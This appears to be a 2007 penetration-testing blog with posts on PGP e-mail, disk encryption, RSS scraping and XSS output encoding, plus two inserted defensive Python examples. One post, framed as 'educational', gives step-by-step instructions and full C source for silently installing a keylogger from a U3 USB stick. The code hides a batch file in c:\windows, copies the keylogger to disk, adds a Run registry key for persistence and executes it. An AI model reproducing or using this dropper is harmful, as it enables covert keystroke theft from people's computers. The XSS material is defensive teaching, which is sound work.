Introducing encrypted e-mail software

Filed under:Tools — posted by Consultant on October 17, 2007 @ 1:44 pm

I already talked a bit about encryption software you can use to store files safely on your computer, but what about transferring sensitive information? What about sending sensitive information through e-mail?

For encrypted e-mail to work properly, we need software and/or practices on both ends. This means that if you want your communication with your clients encrypted, then you need to get your clients to do something - which is not an easy thing to do. You just convinced your clients to pay attention to you, and you even sold them a product/service; now you need to use your m4d jedI skills to get them to encrypt their communication - good luck with that.

Truth is that most of them will pay attention: they are already putting money on the table for you, and they somehow trust that you will perform as expected or even far beyond their expectations; so why in the hell wouldn’t they say ‘yes’ to encrypted communications?

And so it begins. What are your options? What’s out there for you?

I personally use PGP (http://en.wikipedia.org/wiki/Pretty_Good_Privacy), but in its GNU version (http://www.gnupg.org/). I represent myself with my Public Key (visible to anyone I want to share it with); using my Public Key, clients can encrypt sensitive information and send it over. I then hold something very private, called a Private Key, which is the only thing that can decrypt information encrypted with my Public Key. It works the same way in both directions, so I need to request the public key of anyone on the other side and use that public key to encrypt any sensitive information before I send it over.

So what do you encrypt? If you only need to send the occasional sensitive file, you could simply use the GPG command line utility, encrypt the files and attach them encrypted to your e-mail.

But what happens when you need to send several e-mails a day, and, worse, the contents of the e-mails themselves are sensitive: dial-in information for a conference call, pricing information in the form of ballpark estimates, or more? Launching a command line tool to encrypt the e-mail contents, storing the result in a file, attaching the file or pasting the encrypted contents into an e-mail and only then sending it…sure turns into a headache.

But thanks to lots of very clever programmers and project managers, and QA…and…thanks to lots of people, there is a series of programs that you can use to adapt PGP to your e-mail client.

The process then turns into:

- You request public keys and import them to your keys database (most of the times just 1 click away)

- You write an e-mail as usual (making sure that the Encrypt e-mail feature is enabled)

- You hit the send button.

- Any other variation that may require one additional step.

- You’re done.
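The key exchange and encrypt/decrypt round trip described in this post, as an added example that is not from the post or from GnuPG: it drives the gpg command line from Python with two throw-away keyrings standing in for the consultant's and the client's machines. The identities, addresses and the dial-in message are made up, and it assumes a GnuPG 2.1+ binary named gpg on the PATH.

```python
import os
import shutil
import subprocess
import tempfile

CONSULTANT = "Consultant <consultant@example.com>"   # constructed identities
CLIENT = "Client <client@example.com>"


def gpg_available() -> bool:
    return shutil.which("gpg") is not None


def gpg(home: str, *args: str, data: bytes = b"") -> bytes:
    """Run gpg against one keyring (GNUPGHOME), batch mode, no passphrase; return stdout."""
    cmd = ["gpg", "--batch", "--quiet", "--pinentry-mode", "loopback",
           "--passphrase", "", *args]
    return subprocess.run(cmd, input=data, capture_output=True, check=True,
                          env={**os.environ, "GNUPGHOME": home}).stdout


def generate_key(home: str, uid: str) -> None:
    gpg(home, "--quick-generate-key", uid, "default", "default", "never")


def export_public(home: str, uid: str) -> bytes:
    return gpg(home, "--armor", "--export", uid)    # the part you may show to anyone


def import_public(home: str, armored: bytes) -> None:
    gpg(home, "--import", data=armored)


def encrypt_to(sender_home: str, recipient: str, plaintext: bytes) -> bytes:
    # --trust-model always: the key was just imported by hand; a real setup
    # verifies the fingerprint out of band before trusting it
    return gpg(sender_home, "--trust-model", "always", "--armor",
               "--encrypt", "--recipient", recipient, data=plaintext)


def decrypt(home: str, ciphertext: bytes) -> bytes:
    return gpg(home, "--decrypt", data=ciphertext)


def round_trip() -> bool:
    """Client encrypts to the consultant's public key; only the consultant's
    private key can open it, and the client's own keyring cannot."""
    with tempfile.TemporaryDirectory() as work:
        homes = {}
        for who in ("consultant", "client"):     # two keyrings, two machines
            homes[who] = os.path.join(work, who)
            os.mkdir(homes[who], 0o700)
        generate_key(homes["consultant"], CONSULTANT)
        generate_key(homes["client"], CLIENT)
        # public keys cross over; private keys never leave their own keyring
        import_public(homes["client"],
                      export_public(homes["consultant"], "consultant@example.com"))
        import_public(homes["consultant"],
                      export_public(homes["client"], "client@example.com"))

        secret = b"Conference dial-in 555-0100, PIN 4242"   # constructed message
        message = encrypt_to(homes["client"], "consultant@example.com", secret)
        if secret in message:
            return False                         # plaintext must not survive encryption
        if decrypt(homes["consultant"], message) != secret:
            return False
        try:
            decrypt(homes["client"], message)    # only the public key lives here
            return False
        except subprocess.CalledProcessError:
            return True
```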

So back to discussing the alternatives around PGP/GPG - how do you integrate it with your e-mail client?

  1. Enigmail (http://enigmail.mozdev.org/) - Works with Thunderbird, SeaMonkey, Mozilla and Netscape. This is the one I currently use and it kicks ass.
  2. PGP Desktop (http://www.pgp.com/) - Works at least with Outlook. This is the one your valuable clients may already be using. It isn’t free - so good luck trying to convince someone to buy a license.
  3. What could the third one be? I encourage anyone to submit more options!

Tired of writing - hope you found this useful.

Thanks for reading.

Introducing TrueCrypt, BestCrypt & PGP Disk

Filed under:Tools — posted by Consultant on October 14, 2007 @ 1:52 pm

If you work with sensitive information, you need a safe place to store it. Even if the information is only temporarily stored on your computer and needs to be removed at some point, you need a safe way of deleting/wiping it off your drive.

These are the three most popular options at the moment:

  • TrueCrypt
  • BestCrypt
  • PGP Disk

My recommendation goes to TrueCrypt - the only open-source one of the three, and it provides a wide set of tested algorithm implementations. I did try BestCrypt before, but it isn’t free, and twice I ran into the very uncomfortable situation where the encrypted containers got corrupted and the encryption keys were no good.

The encryption algorithms provided by TrueCrypt are:

  • AES
  • Serpent
  • Twofish

In addition, you may ‘cascade’ two or more algorithms.

TrueCrypt and BestCrypt are multiplatform - BestCrypt provides a Linux binary which I successfully tested in the past. It is packaged in the form of several utility binaries which I believe were suid, and for which some security vulnerabilities were published in the past.

I currently have my e-mail profile stored in one encrypted container and any sensitive information stored in a different container - that way I don’t have the container with all the sensitive information mounted at all times.

I would avoid using the auto-mounting features - it makes little sense to store everything in a secured container and then have it accessible at all times.

Try them out and let me know!

Sample code for U3 Sandisk USB autorun

Filed under:Code — posted by Consultant on October 12, 2007 @ 10:12 pm

This is just for educational purposes only and meant for keeping this code somewhere accessible. The other night I tried to create a keyboard sniffer which would get installed and running by using the autorun feature of U3 sandisk USB sticks.

I reformatted the U3 ISO by using the incredible u3-autorun project located at:

http://sourceforge.net/projects/u3-autorun/

The tool explains that if you get the LPInstaller utility (the link for downloading it is referenced inside the project package file) to be in the same directory of the ISO file (cruzer-autorun.iso) then the tool will simply use the local iso file instead of downloading it from the sandisk web servers.

Well facts are that in my case that didn’t work - so I followed some instructions that I found online where given the fact that the LPInstaller downloads an unsigned/unencrypted ISO file from the webservers, you could simply trick the program into downloading the iso file from the webserver of your choice (i.e.: pointing u3.sandisk.com to 127.0.0.1 by modifying your win32\system32\drivers\etc\hosts file) - and that worked like a charm.

Once the new ISO file is deployed in the unwriteable partition of the USB stick, you can create an autorun.inf (can’t remember the exact filename, there’s a sample file included tho) file in the writeable partition and have the autorun program run any program of your choice.

So I grabbed the pyKeylogger from http://pykeylogger.sourceforge.net and modified the code to exclude the Donation nag window which shows up after X days of usage and is veeery easy to disable (when I should have donated to the project instead! I encourage you to do so..it’s a nice piece of software) and recompiled/packaged the whole python keylogger into a windows executable.

Very easy you could say, although I thought that was it - when I realized that the keylogger remained inside the USB stick after being executed (and I wanted it to be persistent) I had to find a way of making the keylogger copy itself to the user’s hard drive and then find a way of executing it off the hard drive, not off the USB stick.

REMEMBER: This was all done for educational purposes only and never meant to harm anyone.

So these are the two paths that I could have followed:

A) I could have modified the autorun ISO code, generate a new ISO and then replace the U3 ISO with my new one.

B) Use the autorun ISO as-it-is, as I downloaded it from sourceforge.

Unfortunately, or fortunately…? I followed (B) - I decided it wouldn’t be so damn much of a workaround to find a way of making the default autorun ISO copy a file and then execute it. Unluckily for me, the autorun.inf file that is supported by the u3-autorun program only takes 1 binary filename (which it probably runs CreateProcess for) but takes absolutely no arguments (or not the way I tried) and of course it doesn’t take batch files either.

But it was around 1, 2am and I didn’t quite find out the latter (batch files execution) until I had already created a whole batch file which took care of xcopying the contents of the ‘dist’ directory (Where the pykeylogger distribution resides inside the usb stick) to a temporary directory inside c:\temp

So once the batch file exists, I find out I can’t use a batch filename inside the autorun and I code a quick program in C. The program in C contains the code that is listed below.

The final formula was:

  1. The ISO u3-autorun.inf ends up executing my-c-program.exe
  2. my-c-program.exe creates a hidden batchfile in the user’s c:\windows directory
  3. the batchfile creates a temporary directory inside c:\temp and copies the contents of the \dist subdirectory inside the USB stick where the keylogger distribution resides to that temporary subdirectory inside c:\temp
  4. the batchfile creates a registry entry at CurrentVersion\Run calling a batchfile inside the keylogger directory, which ends up executing the keylogger using the local path.
  5. the batchfile executes the keylogger
  6. and my-c-program.exe after creating the batchfile executes the batchfile by calling execve and calling cmd.exe using /c batchfilename as parameters.

The reason I had to do all this mess is because:

  • I wanted the keylogger to remain persistent, so it would install by inserting the usb stick and stay persistent if the usb stick was removed/the computer was restarted/etc.
  • If the pykeylogger is run using a full path and not sitting in the local directory, then certain errors are thrown (and I didn’t mind looking into the source for patching those problems..I should have..?)
  • Once the USB stick drive is inserted and the autorun file is executed - I needed to know the full path (drive letter) of the USB stick dist subdirectory (which I worked around at 2am by creating the batch file dynamically from within the exe file, which parses argv[0] - instead of going through the MSDN looking for something like GetModuleFileName() that would work)
  • I can’t really remember - but it’s 2 am today again..so it’s fair.

Here’s the sample C code so it remains somewhere handy:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strncpy, strtok */
#include <windows.h>

#define BATCH_PATH "c:\\windows\\win255.bat"
#define CMD_PATH "c:\\windows\\system32\\cmd.exe"

int
main(int argc, char **argv) {

FILE *myfile;
char *params[4];
char *res = 0x0;
char final[10000];
char localpath[255];

/* %s is replaced with the drive letter taken from argv[0] (see strtok below) */
char *batch_contents = "@echo off\nmkdir c:\\temp\nmkdir c:\\temp\\win21\nxcopy /E %s\\dist c:\\temp\\win21\\\nc:\ncd c:\\temp\\win21\nreg ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v winservices /t REG_SZ /d c:\\temp\\win21\\winservices.bat\ncls\nwinservices.exe\n\0";

 params[3] = 0x0;
 params[2] = BATCH_PATH;
 params[1] = "/c";
 params[0] = CMD_PATH;

 myfile = fopen(BATCH_PATH, "w");
 if (myfile == NULL) exit(-1);

 /* argv[0] looks like E:\...\my-c-program.exe; the first token is the drive letter */
 strncpy(localpath, argv[0], sizeof(localpath)-1);
 res = strtok(localpath, "\\");
 if (res == NULL) exit(-1);

 _snprintf(final, sizeof(final)-1, batch_contents, res);
 final[sizeof(final)-1] = 0x00;
 fprintf(myfile, "%s", final);
 fflush(myfile);
 fclose(myfile);

 /* hand over to cmd.exe /c <batch file> */
 execve(params[0], params, NULL);

 return 0;
}

RSS syndicating content

Filed under:Blogs — posted by Consultant on @ 7:35 am

A couple of days ago I discovered these WordPress plugins which are meant to grab any syndicated content published through RSS (either using ATOM or other means) in blogs and, after grabbing the content, republish it in your own blog.

The first tool is called feedwordpress and can be found here:

http://projects.radgeek.com/feedwordpress/

There’s a whole discussion on how this is actually stealing content - given the increase in the amount of websites on the Internet these days, the only way of telling crappy from non-crappy sites is through actual “content”, which makes “borrowing” content a critical crime :)

Well there’s a whole purpose behind using these tools for “good” - I know they are very common in the porn industry where simple blogs created to do nothing but earn money need daily content and through these tools they can use the RSS feeds provided by the “affiliate companies” (the ones who pay the webmasters money per sale, recursive sale, whatever) to host new content every day.

Another tool that can be used for hosting remote content is also WP-o-matic:

http://devthought.com/wp-o-matic-the-wordpress-rss-agreggator/

I haven’t tried that one, the site looks nice tho’ :)

So where was I going.. oh, yeah - well there are plenty of blogs created by information security experts out there, plenty, and having a unique space where their content meets would be nice - not relying on stand alone RSS feed readers. But then again, I thought about it twice and decided to create my own posts referencing their content. That way I get to force myself into reading every single blog and getting the sweetest posts here.

Hope that makes sense.

Mark Curphey’s blog, a must read

Filed under:Blogs — posted by Consultant on @ 7:18 am

I don’t even know this guy - never had a verbal nor written word exchanged with him. Nevertheless, his blog is interesting and could be considered a must-read for someone in the information security industry. It sure looks like he has some years experience on penetration testing and participates in OWASP related meetings/events.

He recently joined the ACE Team, one of Microsoft’s security oriented teams where a series of known names have worked at in the past and several are currently working. It looks like the ACE Team is performing some heavy head hunting.

This guy is based in the UK and looks friendly; he is even inviting anyone in the UK to join him and his bank friends for dinner & drinks in his “London Security Supper Club” post at:

http://securitybuddha.com/2007/09/26/london-security-supper-club/

So, again, I will probably be quoting this guy a few times through any future posts, but definitely add his posts to your RSS feed. The base url of his blog is:

http://www.securitybuddha.com/

Talk to you all later.

A two-minutes post on fixing Cross site scripting issues

Filed under:Cross site scripting — posted by Consultant on October 11, 2007 @ 3:54 pm

Hey programmers, this is simply a short and small recommendation, generic and not language-dependent. Please take two minutes or less to go through this post if you are new to the world of cross site scripting and you’re in the process of learning how to code securely.

It is critical that you don’t use a single encoding function in a find-and-replace manner. Some websites will blindly recommend that programmers use HTML encoding functions (i.e.: Server.HtmlEncode in ASP) for encoding on output; however, HTML encoding only does any good in specific cases. It is extremely important that you understand the context where the vulnerability is taking place in order to understand which characters you need to encode and the way those characters need to be encoded.

For example, HTML encoding will usually just encode a small set of 4 characters, < > & and ", into their HTML entities (&lt; &gt; &amp; &quot;), and using it on the following example will do absolutely nothing to fix the issue that exists in this PHP line:

<input value='<?=dynamic_dangerous_variable?>' type="text" id=name>

If you are wondering why, then look at the characters that enclose the contents of the value attribute and refer back to the 4 characters the HTML encoding function encodes. Right: the function does not take care of encoding single quotes, therefore the issue still exists. An attacker could easily use a single quote to escape from the value attribute and either continue writing attributes for the input tag (such as onclick, onmouseover, …) or, if the encoding function allowed it (which is not the case here, since > is encoded), close the input tag and continue writing the malicious payload.

Strong encoding libraries such as Reform, the multi-language encoding library originally developed by Michael Eddington and now adopted by the OWASP project, provide several sets of encoding functions to be used in different contexts.

The Reform library is available at the OWASP encoding project (http://www.owasp.org/index.php/Category:OWASP_Encoding_Project)

Another thing to keep in mind is NOT to opt for generic filtering layers instead. Take some more time and perform encoding wherever needed; that is the right thing to do. Filtering layers could turn out strong, but strong filtering layers mean several headaches. Why? If you look around, you will find that Cross site scripting attacks have evolved incredibly over the years, and so have the techniques used to disguise them.

A full listing of the different techniques used to disguise XSS attacks can be found at the Cross Site Scripting Cheat Sheet available at http://ha.ckers.org/xss.html (it goes offline every now and then, so be patient).

Hence if what you want to do is ‘filter all malicious characters’ you will end up filtering a really wide set of characters that you will most likely need for your application to run.

Should I have time and the will, you will soon find another post with regards to different techniques that exist in order to bypass filtering layers. You may want to test them on your own layers and see what happens :)

Finally, you may want to avoid HTML encoding in situations where the dynamic data being displayed to the browser is a URL. It is usually very easy to break functionality (break the URL, for instance), and that is something you definitely do not want to happen: you might fix the XSS issue but you will end up with a problem in QA. Therefore you can either validate the URL using a regex or, if the dynamic portion of the URL is the querystring, encode the querystring values using some kind of UrlEncode method.
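The single-quoted attribute from the PHP line above, rendered through the 4-character encoder and then through a context-aware attribute encoder, as an added example that is not from the post and not Reform's API: a small attribute tokeniser shows which encoder lets the payload add an onmouseover attribute. The helpers, the payload and the URL-context function for the last paragraph are all constructed here.

```python
import html
import re
from urllib.parse import urlencode


def html_encode_4(s: str) -> str:
    """The minimal encoder the post describes: only < > & " become entities."""
    return (s.replace("&", "&amp;").replace("<", "&lt;")
             .replace(">", "&gt;").replace('"', "&quot;"))


def attr_encode(s: str) -> str:
    """Attribute context: every non-alphanumeric character becomes &#xHH;, so
    neither quote style nor whitespace can terminate the attribute value."""
    return re.sub(r"[^A-Za-z0-9]", lambda m: "&#x%02X;" % ord(m.group()), s)


def render(value: str, encode) -> str:
    """The PHP line from the post, with the dynamic value passed through an encoder."""
    return "<input value='%s' type=\"text\" id=name>" % encode(value)


# attribute tokeniser: name, optionally = "double", 'single' or unquoted value
_ATTR = re.compile(r"""([A-Za-z_:][-\w:.]*)\s*(?:=\s*(?:"[^"]*"|'[^']*'|[^\s'">]+))?""")


def attribute_names(tag: str) -> list:
    """Split an <input ...> start tag into attribute names the way a browser groups them."""
    body = tag[len("<input"):].rstrip(">")
    return [m.group(1).lower() for m in _ATTR.finditer(body)]


def decodes_back(s: str) -> bool:
    """Encoding is lossless: the browser restores the original value."""
    return html.unescape(attr_encode(s)) == s


def safe_query_url(base: str, **params) -> str:
    """URL context from the last paragraph: URL-encode the query-string values
    rather than HTML-encoding the whole URL and breaking it."""
    return base + "?" + urlencode(params)


PAYLOAD = "' onmouseover='alert(1)"     # constructed attacker-controlled value


def compare() -> dict:
    """Attribute names of the rendered tag under each encoder."""
    return {"html_encode_4": attribute_names(render(PAYLOAD, html_encode_4)),
            "attr_encode": attribute_names(render(PAYLOAD, attr_encode))}
```

With html_encode_4 the payload passes through untouched and the tag gains an onmouseover attribute; with attr_encode the tag keeps exactly value, type and id.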

.-

Java programmers can also defend against XSS

Filed under:Cross site scripting — posted by Consultant on @ 3:44 pm

Cross site scripting issues are everywhere - I’ll try to provide as many resources as possible for programmers in different programming languages and show them how to take the basic steps towards protection.

Remember the basics: Always perform encoding at the time of displaying dynamic data to browsers. If you browse around the blog you should find more information on XSS and how to educate yourself as a programmer or individual (well programmers are individuals too, yeah.)

If your programming language is Java, then you should take a look at the StringEscapeUtils Java class, which belongs to the Apache Commons namespace. It provides a nice set of encoding methods/functions that you need to have handy when programming web based interfaces.

The Url for such class can be found here:

http://jakarta.apache.org/commons/lang/api/org/apache/commons/lang/StringEscapeUtils.html

In addition to providing encoding methods, the StringEscapeUtils class also provides decoding functionality - both encoding and decoding are available in their Html, Javascript, Java, Xml and SQL versions (this last one is not meant for XSS, but worth mentioning.)

Here’s a table of the different methods and references:

static String escapeHtml(String str)
Escapes the characters in a String using HTML entities.

I will also cover in future posts any other encoding libraries available out there. For the moment, a nice alternative could be Michael Eddington’s encoding library named ‘Reform’ and which has recently (?) been adopted by the OWASP Encoding project. The library and the project can be found at:

http://www.owasp.org/index.php/Category:OWASP_Encoding_Project

Hope that’s enough information for now.

Perl programmers, protect against XSS

Filed under:Cross site scripting — posted by Consultant on @ 3:34 pm

This post is meant for any Perl programmers out there, to give them a hint when developing code which is meant to be safe (can’t guarantee!) from Cross site scripting problems. The main message, as always, is to make sure that you are encoding your data before it gets displayed to browsers, especially when this information comes from untrusted sources (i.e.: user input, databases, etc.) You can either go for HTML-encoding or URL-encoding, or even any home-grown method of your choice, depending on the context behind what’s being encoded and where it is being placed.

www-perl

An alternative using www-perl would be:

use HTML::Entities;   # HTML::Entities::encode lives in HTML::Entities, not in a CGI module

print "Information", HTML::Entities::encode($text);
# a value placed in a URL belongs in the URL context (URI::Escape::uri_escape), not HTML entities
print "It is located in (URL)", HTML::Entities::encode($text);

Apache utils

A different alternative now using Apache utils can be:

use Apache::Util;

# $e is the mod_perl request/output handle; escape_html entity-encodes < > & "
$e->print(Apache::Util::escape_html($myText), "\n");
$e->print('<a href="/">link</a>');

I will keep working on this information in future posts - this is just a first step forward.

Hello, world.

Filed under:Uncategorized — posted by Consultant on @ 3:21 pm

Hello world! Welcome to the experimental penetration testing blog at penetrationtests.com. Let’s hope for quality content and a good future.

Cheers.
